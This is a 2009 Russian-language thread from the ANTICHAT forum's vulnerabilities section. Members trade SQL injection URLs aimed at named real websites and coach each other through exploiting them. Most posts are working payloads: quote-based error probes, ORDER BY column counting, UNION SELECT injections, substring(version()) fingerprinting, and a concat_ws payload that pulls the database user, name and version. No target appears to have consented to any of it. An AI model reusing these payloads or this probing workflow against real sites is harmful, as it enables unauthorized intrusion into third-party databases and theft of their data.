HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.03.2009, 12:33
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

фигасе
)
 
Ответить с цитированием

  #2  
Старый 06.03.2009, 17:27
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
А аналоги под линуху есть?
Burp Suite, WebScarab
 
Ответить с цитированием

  #3  
Старый 06.03.2009, 17:46
+++AndreyDevil+++
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами: 9140897

Репутация: 90
По умолчанию

Есть скуля======================================== ================
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1'
================================================== ==============
Слобцов 7......
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7--
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8--
================================================== ==============
Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7--
Всё равно пишит-------The used SELECT statements have a different number of columns
================================================== ==============
Что такое? Как это обойти?
================================================== ==============
P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать?
Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел))))
================================================== ==============
================================================== ==============
 
Ответить с цитированием

  #4  
Старый 06.03.2009, 17:51
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5--
Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4--
Код:
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3--
3-тяя ветка, в ней union select непашет!

Последний раз редактировалось -m0rgan-; 06.03.2009 в 17:54..
 
Ответить с цитированием

  #5  
Старый 06.03.2009, 18:06
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от -m0rgan-  
3-тяя ветка, в ней union select непашет!
Мде

А мне кажется пятая
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+

+++AndreyDevil+++
Там двойной запрос

а вторая отлично перебирается, просто кавычку нужно ставить
http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database (),Version()),4,5,6,7,8,9,0,11/*
 
Ответить с цитированием

  #6  
Старый 06.03.2009, 19:34
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами: 9330638

Репутация: 93
По умолчанию

Цитата:
http://listok.ura.ru/photo/index.php?id=6'
есть скуля... вроде. но что то не так
Цитата:
http://www.vedomosti.ru/newsline/index.shtml?2009/03/05/738007'
поможете?)

Последний раз редактировалось VITАL; 06.03.2009 в 20:51..
 
Ответить с цитированием

  #7  
Старый 06.03.2009, 20:17
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

VITАL
https://forum.antichat.ru/showpost.php?p=1152922&postcount=5810

Тебе по 2 раза нужно отвечать?
 
Ответить с цитированием

  #8  
Старый 06.03.2009, 20:43
VITАL
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами: 9330638

Репутация: 93
По умолчанию

jokester
спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет
 
Ответить с цитированием

  #9  
Старый 07.03.2009, 01:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64.html

Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.
 
Ответить с цитированием

  #10  
Старый 07.03.2009, 01:21
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.

Пока только так вижу:

http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...